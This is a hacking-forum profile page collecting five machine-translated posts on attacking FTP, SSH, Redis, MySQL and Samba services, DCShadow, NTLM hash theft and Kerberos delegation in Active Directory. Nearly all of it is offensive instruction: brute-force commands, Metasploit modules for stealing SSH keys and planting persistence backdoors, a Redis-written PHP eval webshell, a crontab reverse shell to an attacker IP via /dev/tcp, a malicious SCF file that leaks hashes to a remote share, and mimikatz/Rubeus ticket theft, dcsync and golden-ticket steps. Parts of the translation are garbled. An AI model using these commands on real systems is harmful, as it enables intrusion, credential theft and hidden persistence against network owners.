Jump to content

UKhackteam

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by UKhackteam

  1. UKhackteam

    Title: Common Service Vulnerabilities

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    常见服务类漏洞 FTP 漏洞 FTP 协议介绍 FTP (File Transfer Protocol) is one of the protocols in the TCP/IP protocol group. The FTP protocol includes two components, one is an FTP server and the other is an FTP client. Among them, the FTP server is used to store files, and users can use the FTP client to access resources located on the FTP server through the FTP protocol. When developing a website, the FTP protocol is usually used to pass web pages or programs to a web server. In addition, because FTP transmission efficiency is very high, this protocol is generally used when transmitting large files on the network. By default, the FTP protocol uses two ports 20 and 21 in the TCP port, 20 is used to transmit data and 21 is used to transmit control information. However, whether to use 20 as the port for transmitting data is related to the transmission mode used by FTP. If active mode is used, then the data transmission port is 20; if passive mode is used, the specific port of the end needs to be negotiated and decided by the server and client. Banner 信息 Banner information exposes vulnerabilities in any software or service running on a remote system, so its software version needs to be hidden after installing any service. 匿名登录 anonymous login msf 1 scanner/ftp/anonymous module 中间人嗅探 Attackers can use sniffing tools to help them sniff packets transmitted between servers and clients in the network and retrieve credentials, called sniffing, and then use them for unauthorized access. As mentioned above, FTP users can authenticate themselves using a plaintext login protocol for username and password. FTP 暴力破解工具 hydra 1 hydra -v -L user.txt -P pass.txt ftp://ip MSF 1 auxiliary/scanner/ftp/ftp_login vsftpd 笑脸漏洞 Version: vsftp 2.3.4 back door: If the username contains :) you can enable the backdoor shell bound to port 6200 防御 Modify the banner information on the configuration Add ssl certificate (SSL_Enable=YES) Whitelist restriction login iptables Set the number of logins and login threads SSH 漏洞 SSH 简介 SSH is the abbreviation of Secure Shell, formulated by the IETF's Network Working Group; SSH is a security protocol based on the application layer. SSH is a more reliable protocol designed for remote login sessions and other network services. Using the SSH protocol can effectively prevent information leakage during remote management. SSH was originally a program on UNIX systems, but later it quickly expanded to other operating platforms. SSH can compensate for vulnerabilities in the network when used correctly. SSH client is suitable for a variety of platforms. Almost all UNIX platforms—including HP-UX, Linux, AIX, Solaris, Digital UNIX, Irix, and others—can run SSH. 端口扫描 nmap 1 nmap -sV -p 22 IP msf 1 auxiliary/scanner/ssh/ssh_version 密码破解 msf 1 2 use auxiliary/scanner/ssh/ssh_login set stop_on_success true SSH 用户代码执行 msf 1 use exploit/multi/ssh/sshexec 使用 RSA 密钥建立 SSH 连接 Configuration: 1 2 3 4 5 6 7 8 ssh-keygen cd /home/kali/.ssh ls cat id_rsa.pub authorized_keys scp msfadmin@ip:/home/msfadmin/.ssh/id_rsa ./ sudo vim /etc/ssh/sshd_config PasswordAuthentication no sudo /etc/init.d/ssh restart connect: 1 ssh -i id_rsa username@ip 窃取 SSH 密钥 Obtained meterpreter session, stealing SSH keys 1 2 3 4 use auxiliary/scanner/ssh/ssh_login Get the session use post/multi/gather/ssh_creds set session 1 run SSH 密钥持久性后门 Obtained meterpreter session, leaving SSH key persistence backdoor 1 2 3 4 use auxiliary/scanner/ssh/ssh_login Get the session use post/linux/manager/sshkey_persistence set session 1 run 防御 修改默认端口 1 2 3 sudo vim /etc/ssh/sshd_config port 22222 sudo /etc/init.d/ssh restart Telnet 漏洞 telnet 简介 The Telnet protocol is a member of the TCP/IP protocol family and is the standard protocol and main method of Internet remote login services. It provides users with the ability to complete remote host work on the local computer. Use the telnet program on the terminal user's computer and use it to connect to the server. Terminal users can enter commands in the telnet program, which run on the server, just as they enter directly on the server's console. The server can be controlled locally. To start a telnet session, you must enter a username and password to log in to the server. Telnet is a commonly used method to remotely control a web server. banner 信息 /etc/issue.net msf use auxiliary/scanner/telnet/telnet_version 修改默认端口 /etc/services sudo /etc/init.d/xinetd restart 通过嗅探窃取凭据 plain text transmission, can be sniffed 暴力破解 hydra 1 hydra -v -L user.txt -P pass.txt telnet://IP msf 1 2 3 4 5 6 use auxiliary/scanner/telnet/telnet_login set rhost set stop_on_success true set user_file user.txt set pass_file pass.txt run 保护 telnet 免受暴力攻击 will allow traffic access to port 23 from IP address 192.168.1.1 1 sudo iptables -A INPUT -s 192.168.1.1 -p tcp --dport 23 -j ACCEPT drop traffic from other IP addresses on port 23 1 sudo iptables -A INPUT -p tcp --dport 23 -j DROP SMTP 漏洞 SMTP 简介 SMTP is a protocol that provides reliable and efficient email transmission. SMTP is a mail service built on the FTP file transfer service. It is mainly used to deliver mail information between systems and provide notifications about letters. SMTP is independent of a specific transmission subsystem and only requires reliable and ordered data flow channels. One of the important features of SMTP is its ability to transmit mail across the network, namely SMTP mail relay. Using SMTP, mail transmission between processing processes in the same network can be realized, or mail transmission between a processing process and other networks can be realized through a repeater or gateway. SMTP 命令和返回码 MAIL FROM Specify the sender address RCPT TO Specify a single email recipient: there may be multiple RCPT TOs; often after the MAIL FROM command VRFY Used to specify whether the user/emailbox exists; due to security reasons, the server often prohibits this command EXPN Verify that a given mailbox list exists and is often disabled Return code 250: Requires the email operation to be completed 500: Requirement that the email operation is not completed and the email address is unavailable (for example, the email address is not found, or is not accessible) Postfix 简介 postfix is the default mail transfer agent (MTA) for ubuntu http://www.postfix.org SMTP 用户枚举 Ubuntu system users are postfix users telnet Smtp-user-enum msf 手动枚举 SMTP 用户 telnet VERY ftp MAIL FROM:ftp + RCPT TO:ftp SMTP-user-enum 1 2 3 4 5 apt-get install smtp-user-enum smtp-user-enum -M VRFY -u root -t 202.38.xxx.xxx smtp-user-enum -M VRFY -U dic.txt -t 202.38.xxx.xxx smtp-user-enum -M RCPT -u bin -t 202.38.xxx.xxx smtp-user-enum -M EXPN -u bin -t 202.38.xxx.xxx msf 1 auxiliary/scanner/smtp/smtp_enum 暴力破解 hydra 1 hydra -l msfadmin -P passwd.txt smtp://IP Samba 漏洞 Samba 简介 Samba is a free software that implements the SMB protocol on Linux and UNIX systems, consisting of server and client programs. SMB 简介 SMB (Server Messages Block) is a communication protocol for sharing files and printers on a local area network. It provides sharing services for different computers in the local area network to provide files, printers and other resources. The SMB protocol is a client/server protocol through which clients can access shared file systems, printers and other resources on the server. By setting up NetBIOS over TCP/IP, Samba can not only share resources with local network hosts, but also with computers around the world. SMB 信息泄露 msf 1 auxiliary/scanner/smb/smb_version nmap 1 2 nmap -sV -p 445 IP nmap -sV -v -p 445 --script=smb-vuln* nmblookup nmblookup is used to query NetBIOS names and map them to IP addresses in the network using TCP/IP-based NetBIOS queries. These options allow the directing of name queries to a specific IP broadcast area or to a specific machine. All queries are done through UDP. nmblookup is a useful command for enumerating domain/workstation and MAC addresses 1 nmblookup -A 192.168.1.139 nbtscan Scan the name server opened by NetBIOS on a local or remote TCP/IP network, because this is the first step to find the opening share Can work throughout the subnet, not on a single IP 1 nbtscan 192.168.1.1/24 SMBMap SMBMap allows users to enumerate samba shared drives across the entire domain. List shared drives, drive permissions, shared content, upload/download functions, automatic download pattern matching of file names, and even execution of remote commands. Designed to simplify the search for potentially sensitive data in large networks. 1 2 smbmap -H 192.168.1.139 smbmap -H 192.168.1.139 -u msfadmin -p msfadmin 暴力破解 hydra 1 hydra -L user.txt -P pass.txt -v smb://ip 命令执行 1 2 search smb 3.0.20 use exploit/multi/samba/usermap_script Zookeeper Zookeeper 简介 Zookeeper is a distributed service framework and a sub-project of Apache Hadoop. It is mainly used to solve some data management problems often encountered in distributed applications, such as: unified naming services, state synchronization services, cluster management, and management of distributed application configuration items. 环境搭建 1 2 3 4 wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.14/zookeeper-3.4.14.tar.gz tar -xzvf zookeeper-3.4.14.tar.gz mv zoo_sample.cfg zoo.cfg ./zkServer.sh start 未授权访问 Zookeeper has no password set by default. Without any access control, an attacker can obtain a large amount of sensitive information from the system by executing the env command, including the system name and Java environment. Zookeeper's default port is enabled on port 2181 1 2 netstat -an | grep 2181 nmap -sV -p 2181 IP 1 nc IP 2181 envi Print detailed information about the service environment stat List statistics about performance and connection clients ruok Test whether the server is running in a non-error state reqs List unfinished requests dump List unfinished sessions and temporary nodes Graphical interface tools: ZooInspector Mysql 漏洞 Mysql 简介 Mysql database is one of the most widely used databases in the world. Many famous companies and sites use Mysql as their database support. Currently, many architectures use Mysql as the database management system, such as LAMP, WAMP, etc. Mysql 信息收集 版本信息 1 2 3 4 nmap: nmap -sV -p 3306 IP msf: use auxiliary/scanner/mysql/mysql_version 其它相关信息 1 use auxiliary/admin/mysql/mysql_enum Mysql 密码破解 hydra 1 hydra -L user.txt -P password.txt -v mysql://IP msf 1 use auxiliary/scanner/mysql/mysql_login Mysql 漏洞利用 MySQL 身份认证漏洞(CVE-2012-2122) https://secists.org/oss-sec/2012/q2/493 The return value of memcmp() is within [127, -128]. Compare the two strings by character. If you find a different one, subtract the two characters and return When memcmp() returns 0, check_scramble() passes the authentication 漏洞利用 msf: 1 use auxiliary/scanner/mysql/mysql_authbypass_hashdump Linux shell: 1 for i in `seq 1 1000`;do mysql -uroot -pwrong -h IP -P3306;done Redis redis 简介 Redis is one of the non-relational databases that people often call. It is an open source log-type and Key-Value database written in the ANSI language, supports network-based and persistent log-type and Key-Value databases, and provides APIs in multiple languages. Redis is like memcached. To ensure efficiency, data is cached in memory. However, Redis will periodically write updated data to disk or write modification operations to appended record files, and on this basis, it realizes master-slave (master-slave) synchronization. redis 未授权访问漏洞 The default configuration is to use port 6379 and does not have a password. This will result in unauthorized access to read and write Redis data. 在 web 目录下写入 Webshell 1 2 3 4 config set dir /var/www/html config set dbfilename webshell.php set webshell '?php phpinfo();' save Tips for redis to write shell when the database is too large: 1 2 3 4 5 6 ?php set_time_limit(0); $fp=fopen('webshell.php','w'); fwrite($fp,'?php @eval($_POST[1]);'); exit(); ? 写 ssh 公钥 1 2 3 4 5 6 7 ssh-keygen -t rsa cd .ssh (echo -e '\n\n'; cat id_rsa.pub; echo -e '\n\n') 1.txt cat 1.txt | redis-cli -h ip -x set payload config set dir /root/.ssh config set dbfilename authorized_keys save 写 crontab 1 2 3 4 5 redis-cli -h 192.168.0.104 set xxx '\n\n*/1 * * * * /bin/bash -i/dev/tcp/192.168.0.104/4444 01\n\n' config set dir /var/spool/cron config set dbfilename root save 利用 redis 主从复制 rce https://geekby.xyz/2019/07/15/redis-ji-yu-zhu-cong-fu-zhi-de-rce-li-yong-fang-shi/ Zabbix 漏洞 Zabbix 简介 Zabbix is a network monitoring and management system developed by Alexei Vladishev, based on the ServerClient architecture. Can be used to monitor the status of various network services, servers, network machines, etc. Use various Database-ends such as MySQL, PostgreSQL, SQLite, Oracle IBM DB2 to store data. The server side is based on C language, and the web management side frontend is based on PHP. Zabbix can be monitored in a variety of ways. You can just use Simple Check without installing the client, or you can monitor it based on various SMTP or HTTP protocols. After installing Zabbix Agent in clients such as UNIX, Windows, you can monitor CPU Load, network usage status, hard disk capacity and other states. Even if the Agent is not installed in the monitoring object, Zabbix can monitor the target via SNMP, TCP, IMP, PMI, SSH, and telnet. In addition, Zabbix includes various Item alert functions such as XMPP Zabbix SQL 注入漏洞 https://geekby.xyz/2019/03/01/zabbix-latest.php-sql-zhu-ru-lou-dong/ Zabbix 命令执行利用 During the installation and configuration of Zabbix, the administrator used a weak password or a default username and password. For example: Admin/zabbix, in this way, the user authentication of the Zabbix server is useless. Attackers can create system.run[command,] monitoring items to execute commands, and even obtain server shells to perform various mining activities. https://www.jianshu.com/p/675b6385b7c0 Elasticsearch 漏洞 Elasticsearch 简介 Elasticsearch is a distributed, high-scaling, high-real-time search and data analysis engine. It can easily enable a large amount of data to be searched, analyzed and explored. Taking full advantage of Elasticsearch's horizontal scalability can make data more valuable in production environments. The implementation principle of Elasticsearch is mainly divided into the following steps. First, the user submits the data to the Elasticsearch database, and then uses the word segmentation controller to store the corresponding statement and word segmentation into the data. When the user searches for data, he or she ranks the results according to the weight, and then scores them according to the weight.
  2. UKhackteam

    Title: DCShadow Attack

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    DCShadow 攻击 On January 24, 2018, Benjamin Delpy (author of Artifact Mimikatz) and Vincent Le Toux unveiled a new attack technology for the domain active directory during the BlueHat IL meeting DCShadow With domain administrator privileges, an attacker can create a fake domain controller and copy preset object or object properties to the running domain server DCSync copy things from the domain server, DCShadow copies data to the domain server Luc Delsalle verifies and describes this technology in detail, and treats the flaws and remedies of the Red and Blue team against the Chinese and Blue team against this attack technology. Judging from the functions currently displayed by DCShadow, it can only be used for hidden back doors that can be used for red and blue confrontation. But DCShadow clarifies and implements the first time that it fakes a minimum requirement collection of DCs, which contributes very much. Many attack methods in the past were stuck and could not forge domain servers, such as MS15-011 and MS15-014. With the foundation of DCShadow, I believe there will be many new attack methods in the future. 流程 According to Luc Delsalle's description, the attack process of DCShadow includes 3 main steps : 1. Register a fake DC in the AD active directory of the target domain; 2. Make the forged DC recognized by other DCs and be able to participate in domain replication; 3. Force trigger domain copying, and synchronously copy the specified new object or modified object attributes to other DCs; 注册伪造的 DC If a machine wants to register as a DC server in the domain, it is necessary to register an NTDS-DSA (nTDSDSA) class object in the active directory of the domain. The registered location is CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=adsec,DC=com The adsec.com domain has 3 domain servers, namely LABDC01, RESDC01 and WIN2016-DC01. The domain server marked red is the domain server of our experimental environment. The machine we tested is Win7X86cn04. If the test is successful, a new NTDS-DSA (nTDSDSA) class object will be generated. Check out the security descriptors of CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=adsec,DC=com. It can be seen that the domain administrator privileges must be used to have write permissions. Therefore, when launching a DCShadow attack, you must have domain administrator permissions, but we can experiment and do some tricks, and it will be easier to deal with. For example, if you give full permissions to ordinary users, ordinary users can also modify them. DC Shadow source code: 注册的 DC 被其他 DC 认可,能够参与域复制 A newly registered DC needs to be recognized by other DCs in the domain and be able to participate in domain replication, must be met 1. This forged DC has certification certificates and can authenticate to the domain, that is, it has an account within the domain, and can use a machine account. In the experimental environment, WIN7X86CN04$; 2. Forgetting that DC can authenticate the account that other DCs can access. If we add SPN to WIN7X86CN04$, we can achieve this. The key is which SPNs need to be added. One of the major contributions of DCShadow is to find the smallest collection of SPNs, which only requires 2 :DRS services (GUIDs are E3514235–4B06–11D1-AB04–00C04FC2DCD2) and GS (Global Catalog) services. 3. When running DRS services, you need to implement at least four RPC interfaces: IDL_DRSBind, IDL_DRSUnbind, IDL_DRSGetNCChanges, and IDL_DRSUpdateRefs, so that other DCs can obtain the data that needs to be copied through RPC. The latest version of Mimikatz tool has integrated these 4 interfaces 强制立即发起域复制 The process usually responsible for domain replication and synchronization is the KCC process. The default time is 15 minutes to verify, and it will be initiated if replication is required. You can also use the system tool repadmin, which comes with Windows domain server, which will call the DRSReplicaAdd function interface to force domain replication to be initiated immediately. DCShadow forces domain replication to be initiated immediately by calling the DRSReplicaAdd function. 攻击复现 View the security descriptor of CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=adsec,DC=com. It can be seen that the domain administrator privileges must be used to have write permissions. Therefore, when launching a DCShadow attack, you must have domain administrator permissions, but we can experiment and do some tricks, and it will be easier to deal with. For example, if you give full permissions to ordinary users, ordinary users can also modify them. 攻击时注意防火墙的设置
  3. UKhackteam

    Title: Get NTLM

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    获取 NTLM 1 相关背景 1.1 NTLM 的存储位置: 1. System Database SAM (Security Account Manager) 2. DIT database 3. Memory Cache 1.2 NTLM 的获取方式 1. Obtain from SAM 2. Memory acquisition 3. DIT database acquisition 4. WCE, PWDUMP, MIMIKATZ… 1.3 NTLM 的形式 aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 LMHash (LMHash will not be saved by default in the windows 2008 R2 system) NTHash NetHash - Mainly obtain this type of hash 1.4 远程获取方式(窃取): 1. Responder 2. HTTP + SMB 3.SCF + SMB4. SQL + SMB ADV 170014 NTLM SSO In October 2017, Microsoft released a security bulletin (ADV170014) on Tuesday's patch day, which mentioned a vulnerability in the NTLM authentication scheme that malicious attackers can use to steal hashes. The attacker simply needs to place a malicious SCF file in a publicly accessible Windows folder. Once the file is placed in a folder, it will be executed by a mysterious bug. It collects the target's NTLM password hash and sends it to a configuration server. The target host has a shared folder without password protection, which is very common. For example, in offices, schools, hospitals, and in most Windows environments, people share music, photos, and documents through shared folders. 攻击场景 Non-authentic systems may not have this setting: Microsoft introduced SCF files in Windows 3.11. SCF files are actually plain text files that can be used to guide Windows File Explorer to perform some basic tasks. 1 2 3 4 5 [Shell] Command=2 IconFile=\\192.168.1.2\sharetest.ico [Taskbar] Command=ToggleDesktop
  4. UKhackteam

    Title: VulnStack ATT\u0026CK 2 Shooting Range

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    VulnStack ATTCK 2 靶场 环境 信息收集 nmap 端口扫描 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 twenty one twenty two twenty three twenty four 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Site doesn't have a title. 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open Microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 Microsoft-ds 1433/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000.00; SP2 | ms-sql-ntlm-info: | Target_Name: DE1AY | NetBIOS_Domain_Name: DE1AY | NetBIOS_Computer_Name: WEB | DNS_Domain_Name: de1ay.com | DNS_Computer_Name: WEB.de1ay.com | DNS_Tree_Name: de1ay.com |_ Product_Version: 6.1.7601 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Issuer: commonName=SSL_Self_Signed_Fallback | Public Key type: rsa | Public Key bits: 1024 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2020-04-18T03:37:19 | Not valid after: 2050-04-18T03:37:19 | MD5: 83a6 3f23 de4f e053 4224 f66c a547 3223 |_SHA-1: 0aad 0382 de96 c9da 3990 3014 360c 7f31 bf78 a3df |_ssl-date: 2020-04-18T06:12:57+00:00; -2s from scanner time. 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: DESKTOP-DUNPKQ9 | NetBIOS_Domain_Name: DESKTOP-DUNPKQ9 | NetBIOS_Computer_Name: DESKTOP-DUNPKQ9 | DNS_Domain_Name: DESKTOP-DUNPKQ9 | DNS_Computer_Name: DESKTOP-DUNPKQ9 | Product_Version: 10.0.17763 |_ System_Time: 2020-04-18T06:12:19+00:00 | ssl-cert: Subject: commonName=DESKTOP-DUNPKQ9 | Issuer: commonName=DESKTOP-DUNPKQ9 | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2020-02-23T21:21:14 | Not valid after: 2020-08-24T21:21:14 | MD5: 5cb3 a3dd 4a5e eb67 80d5 8f39 633f d11b |_SHA-1: 9694 4630 239e d821 3658 976c 40a1 6d3b d9b4 e80f |_ssl-date: 2020-04-18T06:12:57+00:00; -2s from scanner time. 7001/tcp open http Oracle WebLogic Server (Servlet 2.5; JSP 2.1) |_http-title: Error 404--Not Found 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -1h08m35s, deviation: 3h01m23s, media: -2s | ms-sql-info: | 192.168.3.242:1433: | Version: | name: Microsoft SQL Server 2008 R2 SP2 | number: 10.50.4000.00 | Product: Microsoft SQL Server 2008 R2 | Service pack level: SP2 | Post-SP patches applied: false |_ TCP port: 1433 | smb-os-discovery: | OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1) | OS CPE: cpe:/o:microsoft:windows_server_2008:sp1 | Computer name: WEB | NetBIOS computer name: WEB\x00 | Domain name: de1ay.com | Forest name: de1ay.com | FQDN: WEB.de1ay.com |_ System time: 2020-04-18T14:12:22+08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-04-18T06:12:20 |_ start_date: 2020-04-18T03:37:46 Discover the weblogic for port 7001, access http://192.168.3.242:7001/console, version number: 10.3.6.0 Scan the weblogic server using weblogicScanner to discover the cve-2019-2725 vulnerability. 漏洞利用 weblogic Uploading a webshell for subsequent operations. For questions about weblogic upload path, please refer to https://www.cnblogs.com/sstfy/p/10350915.html Ice Scorpion Connection: Upload cs Trojan: implement: I found out that it was a domain user before, so check out ipconfig for ip: It was found that the machine was a dual network card and the intranet was 10.10.10.xx network segment. 内网渗透 dump 密码 提权 Use ms-14-058 to raise the authority to SYSTEM permission to facilitate further operation: 域内信息收集 查看域名 查看域内主机 查看域内用户 查看域控 查看域管 横向移动 Use PsExec to move horizontally to DC: 后门 域控上的信息收集 Crawl the hash of krbtgt: 制作黄金票据 Before injecting the bill: After injecting the bill:
  5. UKhackteam

    Title: Domain Delegation-based Attack

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    基于域委派的攻击 1 域委派相关定义 1.1 定义 Identity delegation is a feature of Active Directoro ry Federation Services (AD FS) that allows administrator-specified accounts to impersonate users. The account that impersonates the user is called the delete gate This delegation capability is critical for many distributed applications for which there is a series of access control checks that must be made sequentially for each application, database, or service that is in the authorization chain for the originating request Many real-world scenarios exist in which a Web application “front end” must retrieve data from a more secure “back end”, such as a Web service that is connected to a Microsoft SQL Server database. Domain delegation is an application model that is often deployed in large networks, which brings great convenience to multi-hop authentication and also brings great security risks. Delegation can obtain domain administrator permissions and even create deep hidden backdoors. Domain delegation refers to delegating the permissions of users within the domain to a service account, so that the service account can carry out in-domain activities with user rights. information There are two types of accounts that can be delegated in the domain:主机账户(Net Computer). The other is a service account (Net User) manually added with setspn. Whether it is non-constrained or constrained, it is an example of a host account, because the environment for delegating using a host account is easy to match and easy to understand. However, service accounts and host accounts are equivalent from the perspective of attack delegation. Service Account (Service Account), a type of user in the domain, the account used by the server to run the service, run the service and join the domain. For example, when MS SQL Server is installed, it will automatically register the service account SqlServiceAccount within the domain. This type of account cannot be used for interactive login. After an ordinary user jack in the domain is authenticated to the foreground WEB service through the Kerberos protocol, the service account websvc that runs the WEB service in the foreground simulates the user jack, and continues to authenticate to the background server using the Kerberos protocol, thereby obtaining the access rights of the jack user in the background server, that is, Kerberos authentication with single or multiple hops in the domain. 1.2 流程 Domain user jack authenticates with Kerberos method to access the web server; The web service runs with the websvc service account, and websvc initiates a jack user's ticket application to KDC; KDC checks the delegation attributes of the websvc user and, if set, returns the jack user's forwardable invoice TGT; After websvc receives the jack user TGT, it uses the ticket to apply to KDC for the service ticket ST to access the file server; KDC checks the delegation attributes of websvc. If set and the file service is in the allowed list, it returns an authorization ticket for jack user to access the file service ST; After the authorization ticket ST of the jack user received by websvc, you can access the file service and complete multi-hop authentication. 1.3 委派类型 There are three main application methods for intradition within the domain : First, non-constrained delegation (Unconstrained Delegation), the service account can obtain a user's TGT, so the service account can use the TGT, which simulates the user's access to any service. The second is Constrained Delegation, which is Kerberos' extended protocol S4U2Proxy. The service account can only obtain the ST of a certain user, so that it can only simulate users accessing specific services. 2 非约束委派 2.1 原理 If the service account B of a service A is set to non-constrained delegation, when user C accesses service A through Kerberos authentication, KDC will check the properties of service account B. When it is found that it is a non-constrained delegation, KDC will place user C's TGT in ST. In this way, B obtains user A's TGT while verifying ST, so that user A can simulate user A's access to any service. After delegating is enabled, there will be an additional flag in the userAccountControl property of the user: WORKSTATION_TRUSTED_FOR_DELEGATION Settings for non-constrained delegation require the SeEnableDelegation privilege, which is usually granted only to the domain administrator. 2.2 实战 2.2.1 非约束委派的查找 2.2.1.1 adfind 查询非约束委派的主机: AdFind.exe -b 'DC=pentest,DC=com' -f '((samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))' cn distinguishedName 查询非约束委派的用户: AdFind.exe -b 'DC=pentest,DC=com' -f '((samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))' cn distinguishedName 2.2.1.2 powerview Note: PowerSploit-dev branch 查询配置非约束委派的用户: Get-NetUser -Unconstrained -Domain pentest.com 查询配置非约束委派的主机: Get-domaincomputer -Unconstrained -Domain pentest.com 2.2.1.3 ldapsearch information Requires the account password of any user in the domain 查询非约束委派的机器:ldapsearch -LLL -x -H ldap://172.16.147.130:389 -D '[email protected]' -w '123456bY' -b dc=pentest,dc=com '((samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))' cn distinguishedName 查询非约束委派的用户:ldapsearch -LLL -x -H ldap://172.16.147.130:389 -D '[email protected]' -w '123456' -b dc=pentest,dc=com '((samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))' cn distinguishedName 2.2.2 非约束委派的利用 2.2.2.1 管理员模拟访问 information Before the experiment, it is recommended to clear the bills in memory, mimikatz under: kerberos:purge Simulate the administrator to call the smb service of the non-binding delegation machine: net use \\win7\c$ Go back to the non-constrained delegation machine and check the ticket (部分截图): 1 2 privilege:debug sekualsa:tickets TGT was intercepted, we used sekurlas:tickets /export to export the tickets At this time, our access to domain control is denied: Then use kerberos:ptt bill file name in mimikatz to inject the bill into memory: Can be accessed successfully. If you want to execute commands, you can use WinRM service to remotely connect to the domain control server: Enter-PSSession -ComputerName DC 2.2.2.2 Spooler Printer Bug In actual combat, it is a waste of time to simply send non-constrained delegation calls for administrators to actively connect. Therefore, the non-constrained delegation + Spooler printer service can force the specified host to connect. Utilization Principle: Take advantage of an old but default enabled method in Windows Printing System Remote Protocol (MS-RPRN), where domain users can use the MS-RPRN RpcRemoteFindFirstPrinterChangeNotification(Ex) method to force any computer running the Spooler service to authenticate the target selected by the attacker through Kerberos or NTLM. POC: https://github.com/leechristensen/SpoolSample Send a request to DC's Spooler service, force it to access win7 for authentication: SpoolSample.exe DC win7 You can use Rubeus to listen for events with Event ID 4624, so that the domain control can be intercepted as soon as possible, and the login from DC is monitored every second (local administrator permission is required) TGT: Rubeus.exe monitor /interval:1 /filteruser:DC$ 注: The TGT captured by Rubeus.exe is base64 encoded, but we do not need to decode. Rubeus can directly inject base64 encoded tickets into memory: Rubeus.exe ptt /ticket:base64 After obtaining TGT, after using PTT to inject the ticket into the current session, you can use dcsync to export the hash of all users in the domain control, and then use the hash of the krbtgt user to generate gold notes. 1 2 3 kerberos:ptt xxxx.kirbi lsadump:dcsync /domain:test.local /all /csv 3 约束委派 3.1 原理 Due to the insecurity of non-constrained delegation, Microsoft introduced constrained delegation in Windows Server 2003, expanded the Kerberos protocol, and introduced S4U, where S4U supports two subprotocols: Service for User to Self (S4U2Self) and Service for User to Proxy (S4U2proxy), both of which allow services to request tickets from KDC on behalf of users. S4U2self can request Kerberos service tickets (ST) for itself; S4U2proxy can request ST of other services in the name of the user, and constrained delegation limits the scope of S4U2proxy extension. Request process for S4U2Self and S4U2proxy (Figure from Microsoft Manual): Steps 1-4 represent the process of S4U2Self request, and Steps 5-10 represent the process of S4U2proxy The user makes a request to service1. The user is authenticated, but service1 does not have user authorization data. Typically, this is because authentication is verified through other means than Kerberos. Request ST1 for accessing service1 from the KDC in the name of the user through the S4U2self extension. KDC returns to Service1 A ST1 for user authentication Service1, which may contain user authorization data. service1 can use authorization data in ST to satisfy the user's request and then respond to the user. Note: Although S4U2self provides information about the user to service1, S4U2self does not allow service1 to make requests for other services on behalf of the user. At this time, it is S4U2proxy's turn to play its role. The user makes a request to service1, which needs to access the resources on service2 as a user. service1 requests the user to access the ST2 of service2 from the KDC in the name of the user If the request contains a PAC, the KDC verifies the PAC by checking the PAC's signature data. If the PAC is valid or does not exist, the KDC returns ST2 to service1, but the client identity stored in the cname and crealm fields of ST2 is the user's identity, not the service1's identity. service1 uses ST2 to send a request to service2 in the name of the user and determines that the user has been authenticated by the KDC. service2 responds to the request in step 8. service1 responds to the user's request in step 5. When set to binding delegation, its userAccountControl property contains TRUSTED_TO_AUTH_FOR_DELEGATION(T2A4D), and the msDS-AllowedToDelegateTo property is set to which protocols From this we can see that the constraint delegation does not require any active request from other users to simulate the user. When you get a user that configures a constraint delegation, you can get the permission to configure the corresponding delegation host. 3.2 实战 3.2.1 约束委派的查找 3.2.1.1 adfind 查询约束委派的主机: AdFind.exe -b 'DC=pentest,DC=com' -f '((samAccountType=805306369)(msds-allowedtodelegateto=*))' cn distinguishedName msds-allowedtodelegateto 查询约束委派的用户: AdFind.exe -b 'DC=pentest,DC=com' -f '((samAccountType=805306368)(msds-allowedtodelegateto=*))' cn distinguishedName msds-allowedtodelegateto 3.2.1.2 powerview 查询约束委派的主机: Get-DomainComputer -TrustedToAuth -Domain test.com -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto 查询约束委派的用户: Get-DomainUser –TrustedToAuth -domain qiyou.com -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto|fl 3.2.1.3 ldapsearch 查询约束委派的机器:ldapsearch -LLL -x -H ldap://IP:389 -D '[email protected]' -w '123456' -b dc=pentest,dc=com '((samAccountType=805306369)(msds-allowedtodelegateto=*))' cn distinguishedName msds-allowedtodelegateto 查询约束委派的用户:ldapsearch -LLL -x -H ldap://IP:389 -D '[email protected]' -w 